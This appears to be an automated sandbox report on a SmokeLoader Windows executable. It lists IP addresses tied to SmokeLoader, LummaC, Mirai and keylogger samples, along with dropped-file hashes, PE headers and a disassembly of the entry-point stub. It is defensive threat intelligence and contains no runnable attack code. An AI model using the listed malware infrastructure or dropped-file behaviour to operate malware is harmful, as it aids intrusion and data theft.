SURFAIRWIRELESS-IN-01 (US) | HaPJ2rPP6w.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | c7v62g0YpB.exe | malicious | SmokeLoader | 23.145.40.162
Match: MT-MPLSMA
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Unknown, Context: 41.248.235.172
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Unknown, Context: 196.65.0.116
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Unknown, Context: 196.206.229.117
• Associated Sample Name: 2qWIvXORVU.elf, Detection: malicious, Threat Name: Mirai, Moobot, Context: 41.248.235.198
• Associated Sample Name: ZEjcJZcrXc.elf, Detection: malicious, Threat Name: Mirai, Context: 105.156.46.188
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Mirai, Context: 196.217.151.19
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Mirai, Context: 41.248.235.169
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Mirai, Context: 41.143.204.148
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Mirai, Context: 41.248.235.163
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Mirai, Context: 41.140.123.123
Match: EPMTelecomunicacionesSAESPCO
• Associated Sample Name: na.elf, Detection: malicious, Threat Name: Unknown, Context: 200.30.80.193
• Associated Sample Name: reswnop.exe, Detection: malicious, Threat Name: Emotet, Context: 201.184.105.242
• Associated Sample Name: 970Qh1XiFt.elf, Detection: malicious, Threat Name: Mirai, Okiru, Context: 190.250.243.68
• Associated Sample Name: MOfHb44mph.elf, Detection: malicious, Threat Name: Unknown, Context: 190.71.251.29
• Associated Sample Name: novo.mpsl.elf, Detection: malicious, Threat Name: Mirai, Moobot, Context: 190.70.75.28
• Associated Sample Name: SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elf, Detection: malicious, Threat Name: Mirai, Context: 190.71.250.128
• Associated Sample Name: SecuriteInfo.com.Linux.Siggen.9999.30976.5557.elf, Detection: malicious, Threat Name: Mirai, Context: 191.98.118.7
• Associated Sample Name: file.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 190.249.193.233
• Associated Sample Name: 7fi7NmSbkN.elf, Detection: malicious, Threat Name: Mirai, Context: 201.233.90.1
• Associated Sample Name: SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elf, Detection: malicious, Threat Name: Unknown, Context: 190.250.218.60
Columns: Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: 72a589da586844d7f0818ce684948eea
• Associated Sample Name: 5zA3mXMdtG.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: Lk9rbSoFqa.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: ctMI3TYXpX.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: bCnarg2O62.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: BzLGqYKy7o.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: UV2uLdRZix.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: LKpIHL2abO.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: wu5C20dPdy.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: HaPJ2rPP6w.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
• Associated Sample Name: c7v62g0YpB.exe, Detection: malicious, Threat Name: SmokeLoader, Context: 23.145.40.164
Match: a0e9f5d64349fb13191bc781f81f42e1
• Associated Sample Name: PWGen_[2MB]_[unsign].exe, Detection: malicious, Threat Name: LummaC, Context: 23.145.40.168
• Associated Sample Name: file.exe, Detection: malicious, Threat Name: LummaC, Context: 23.145.40.168
• Associated Sample Name: file.exe, Detection: malicious, Threat Name: LummaC, Context: 23.145.40.168
• Associated Sample Name: Y1ZqkGzvKm.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 23.145.40.168
• Associated Sample Name: Y1ZqkGzvKm.exe, Detection: malicious, Threat Name: VIP Keylogger, Context: 23.145.40.168
• Associated Sample Name: E_receipt.vbs, Detection: malicious, Threat Name: Unknown, Context: 23.145.40.168
• Associated Sample Name: EY10AIvC8B.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 23.145.40.168
• Associated Sample Name: file.exe, Detection: malicious, Threat Name: LummaC, Context: 23.145.40.168
• Associated Sample Name: 15PylGQjzK.exe, Detection: malicious, Threat Name: LummaC, Vidar, Context: 23.145.40.168
• Associated Sample Name: Ji7kZhlqxz.exe, Detection: malicious, Threat Name: LummaC, Vidar, Context: 23.145.40.168
Columns: Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: C:\Users\user\AppData\Local\Temp\8CAE.exe
• Associated Sample Name: 5zA3mXMdtG.exe, Detection: malicious, Threat Name: SmokeLoader
• Associated Sample Name: Lk9rbSoFqa.exe, Detection: malicious, Threat Name: SmokeLoader
• Associated Sample Name: ctMI3TYXpX.exe, Detection: malicious, Threat Name: SmokeLoader
• Associated Sample Name: bCnarg2O62.exe, Detection: malicious, Threat Name: SmokeLoader
Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):98304
Entropy (8bit):0.08235737944063153
Encrypted:false
SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\explorer.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.017262956703125623
Encrypted:false
SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:false
Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\explorer.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:modified
Size (bytes):78336
Entropy (8bit):6.394001797252911
Encrypted:false
SSDEEP:768:WPQkadQWo2lXlxiK/0PJMQ2VGhm9EGFDe8MRDiNfYg9TQRkAuHi5yvaIoFVr1VML:NBfdSKvVwDEhAuBhoL/MnJ0iXD46w0
MD5:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
SHA1:BA7888FFDB978851F38C4CAC82D58D8CD9A6F077
SHA-256:B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
SHA-512:938CE106217E9CE98F104AF0913054070C2CC5791DFAA9902540CAEF923579B8DE0AF0ED720753BC40ADC75D7E286ACCDE7198315805331F25BE3F312C23F0BC
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:
• Filename: 5zA3mXMdtG.exe, Detection: malicious
• Filename: Lk9rbSoFqa.exe, Detection: malicious
• Filename: ctMI3TYXpX.exe, Detection: malicious
• Filename: bCnarg2O62.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d......f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text...x........................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\explorer.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.017262956703125623
Encrypted:false
SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:false
Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\explorer.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):20480
Entropy (8bit):0.8508558324143882
Encrypted:false
SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:933D6D14518371B212F36C3835794D75
SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.136471148832945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):51200
                                                                                                                          Entropy (8bit):0.8745947603342119
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.1239949490932863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):229376
                                                                                                                          Entropy (8bit):6.055975880815965
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:1vLecAXtCbb5O4Lfakg4sN5ISItt0b+U+lKs:1vLecStCf3t0Itt0b+U+o
                                                                                                                          MD5:1096F19319B5C475C2A12B8D0CC4022D
                                                                                                                          SHA1:B4C8061E0A04228F1297A5EA195CA02C935EDB4F
                                                                                                                          SHA-256:DABFC65A7EF9104855F59A62E81B907AD148BDD177EABAADE320F7207D70DE35
                                                                                                                          SHA-512:CE57012E7F28214C788A44A9DA2AC0A2B0B2125C089191E1C843619D1058D251AC220B28CF9BA17E4E66EEE406834F3879A4183555AD0F5F52EF2510EC1AA873
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z..V...V...V...HIt.O...HIe.F...HIs.....q..U...V...8...HIz.W...HId.W...HIa.W...RichV...................PE..L.....Qe.................P..........g........`....@..........................P...............................................w..(....`..@...................................................0t.......................`..|............................text....N.......P.................. ..`.rdata.......`... ...T..............@..@.data...|............t..............@....yig.........0......................@....tls.........@......................@....jetax.......P......................@....rsrc...@....`......................@..@................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):290443
                                                                                                                          Entropy (8bit):7.999438652934672
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:jpr6nV5QzlKT57kU9EehxB/zGaa5ZweDYFacnO2k8HBZ9NSYCd:jprYK8RREe9/zA5ZRDYFdnPkEdAYC
                                                                                                                          MD5:BDCB30CAAB400F7D6F01ECED315C1B2D
                                                                                                                          SHA1:B5AA581614F4FE7A90A4E8FC7F5FE6AFB417AAE6
                                                                                                                          SHA-256:5D6544C016179556378E3944214E426916F41733E3B5EC68126ED358C7154D5B
                                                                                                                          SHA-512:46511F990ED9A49C3D212881FC3E9D5E9EA5F1F60235EA360201A79D3188F2D5DA96AE595FF2A13C147A17BC0D2A9A173FA9A4908FBFDA4F28F9EB42F2A6CC22
                                                                                                                          Malicious:false
                                                                                                                          Preview:#*.M..n.?........$T.S{H.....Y!..x9.m.A.+.M.;_..:*.d.......ZW..\.v...1_.E..S.bG.N......*.\...../.23...040..995..u:2.(.\.p...q....qE.]1L......1..#Y8....n..$<3Z..:.Xr...\. }.<<..|e..#.....' ......"........n.B.2.........$IzFn<. f.P|!>.?2......H/N..U.H.`.v.M....WY.....[...Y..>.v..(..au.X...j./.F\.....,N..,-w.R.d.X....1:H(G.#Ai...W.)IV.f.~..d8.e......L.....jw..5.He.......b[..:..|.-.C0n..x......&..@...'`.=.mK..........J...Z..3.....f.M7t.../&xe.y.>.@..|.+q....,.Zb...LST...t&rh...oi!e...Pm...}.!A..6..7:.(.c..8....>..v.6.q8...3..#;n.$....'._.>6..t.T..]y.!.<~<.m.{....4_...6$D.h.3o....h.5.. ......2.t.. ...u...x.U.........4L_..OX.W.\uJ..=.e&.f...l.. H5.+l.M...2....y..4P.lJH...6]D.v.F@.f.....P...8w..p._....4.%'B.Z....{P..{...=..n.....x[{....*ffsYk #..d..d.'...}.0.l..n.!..>u.m..a.2....l.w......\..g/.....^f...{. ..k8.F9q.).........$....CPw....%...![.o8....`.8.Q..`Y..~..~.>.2....7..G..N...u[..2..A..._|.!z..({...........N.het.T.....w!...~.f.kA.e....%......../..h..<..n
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):223744
                                                                                                                          Entropy (8bit):6.447332857021577
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:niLgkcGSeF56oQ1dHVAFF4Gu5JxVSlh+VkbOp:niL3cGSfoQ1nAFFGVkCp
                                                                                                                          MD5:2942CB9FCA04E939AF4ED1EEF717E123
                                                                                                                          SHA1:1BC59CA5E75F717DCD23B73634910B35314BCDEE
                                                                                                                          SHA-256:A76320BF90703F6591B6EC9A66522652C04EA3D87ED57F906CF0F8DB209CB4C3
                                                                                                                          SHA-512:3A3A4C8914A0438EC30E0F8AA60B8373452B25BF48162A29BCD3803E4184E080965A2C244E5BD6793055DE3C031036658793EC5A1D890845A834EC0AB2DAE0B9
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L.....e.....................d....................@..................................R......................................D...P....`.....................................................X........................................................text..._........................... ..`.rdata.." ......."..................@..@.data...............................@....tls.........P......................@....rsrc.......`......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):229376
                                                                                                                          Entropy (8bit):6.055975880815965
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:1vLecAXtCbb5O4Lfakg4sN5ISItt0b+U+lKs:1vLecStCf3t0Itt0b+U+o
                                                                                                                          MD5:1096F19319B5C475C2A12B8D0CC4022D
                                                                                                                          SHA1:B4C8061E0A04228F1297A5EA195CA02C935EDB4F
                                                                                                                          SHA-256:DABFC65A7EF9104855F59A62E81B907AD148BDD177EABAADE320F7207D70DE35
                                                                                                                          SHA-512:CE57012E7F28214C788A44A9DA2AC0A2B0B2125C089191E1C843619D1058D251AC220B28CF9BA17E4E66EEE406834F3879A4183555AD0F5F52EF2510EC1AA873
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z..V...V...V...HIt.O...HIe.F...HIs.....q..U...V...8...HIz.W...HId.W...HIa.W...RichV...................PE..L.....Qe.................P..........g........`....@..........................P...............................................w..(....`..@...................................................0t.......................`..|............................text....N.......P.................. ..`.rdata.......`... ...T..............@..@.data...|............t..............@....yig.........0......................@....tls.........@......................@....jetax.......P......................@....rsrc...@....`......................@..@................................................................................................................................................................................................................................................
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):6.447332857021577
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                          • InstallShield setup (43055/19) 0.43%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:O4zPA1oI9Y.exe
                                                                                                                          File size:223'744 bytes
                                                                                                                          MD5:2942cb9fca04e939af4ed1eef717e123
                                                                                                                          SHA1:1bc59ca5e75f717dcd23b73634910b35314bcdee
                                                                                                                          SHA256:a76320bf90703f6591b6ec9a66522652c04ea3d87ed57f906cf0f8db209cb4c3
                                                                                                                          SHA512:3a3a4c8914a0438ec30e0f8aa60b8373452b25bf48162a29bcd3803e4184e080965a2c244e5bd6793055de3c031036658793ec5a1d890845a834ec0ab2dae0b9
                                                                                                                          SSDEEP:3072:niLgkcGSeF56oQ1dHVAFF4Gu5JxVSlh+VkbOp:niL3cGSfoQ1nAFFGVkCp
                                                                                                                          TLSH:D7245A017AF19026EFBB4B75197096942E3BBCF26A7081DE3144361F99733D399A1363
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L......e...
                                                                                                                          Icon Hash:17694db2b24d2117
                                                                                                                          Entrypoint:0x401716
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6598C400 [Sat Jan 6 03:07:44 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:7529a394fc2aae97d1d4dcd49f0468b5
Instruction (entrypoint preview, disassembly starting at 0x401716). The first two instructions are the stock VS2008 CRT entry stub (call __security_init_cookie, then jmp to the CRT startup routine). The function that follows, beginning with mov edi, edi, matches the CRT's __report_gsfailure: it snapshots the registers into a static CONTEXT record, sets ContextFlags to 0x10001 (CONTEXT_CONTROL) and the exception code to 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN), copies the security cookie and its complement, and calls through an IAT slot the disassembler left unresolved. None of this is the loader's own logic; the code worth looking at is the high-entropy .text section listed below, which is unpacked at runtime.
                                                                                                                          call 00007F91FCF32F2Ch
                                                                                                                          jmp 00007F91FCF2F04Eh
                                                                                                                          mov edi, edi
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          sub esp, 00000328h
                                                                                                                          mov dword ptr [0041E888h], eax
                                                                                                                          mov dword ptr [0041E884h], ecx
                                                                                                                          mov dword ptr [0041E880h], edx
                                                                                                                          mov dword ptr [0041E87Ch], ebx
                                                                                                                          mov dword ptr [0041E878h], esi
                                                                                                                          mov dword ptr [0041E874h], edi
                                                                                                                          mov word ptr [0041E8A0h], ss
                                                                                                                          mov word ptr [0041E894h], cs
                                                                                                                          mov word ptr [0041E870h], ds
                                                                                                                          mov word ptr [0041E86Ch], es
                                                                                                                          mov word ptr [0041E868h], fs
                                                                                                                          mov word ptr [0041E864h], gs
                                                                                                                          pushfd
                                                                                                                          pop dword ptr [0041E898h]
                                                                                                                          mov eax, dword ptr [ebp+00h]
                                                                                                                          mov dword ptr [0041E88Ch], eax
                                                                                                                          mov eax, dword ptr [ebp+04h]
                                                                                                                          mov dword ptr [0041E890h], eax
                                                                                                                          lea eax, dword ptr [ebp+08h]
                                                                                                                          mov dword ptr [0041E89Ch], eax
                                                                                                                          mov eax, dword ptr [ebp-00000320h]
                                                                                                                          mov dword ptr [0041E7D8h], 00010001h
                                                                                                                          mov eax, dword ptr [0041E890h]
                                                                                                                          mov dword ptr [0041E78Ch], eax
                                                                                                                          mov dword ptr [0041E780h], C0000409h
                                                                                                                          mov dword ptr [0041E784h], 00000001h
                                                                                                                          mov eax, dword ptr [0041D008h]
                                                                                                                          mov dword ptr [ebp-00000328h], eax
                                                                                                                          mov eax, dword ptr [0041D00Ch]
                                                                                                                          mov dword ptr [ebp-00000324h], eax
                                                                                                                          call dword ptr [000000D4h]
                                                                                                                          Programming Language:
                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                          • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1b744 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x116000 | 0x1a1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
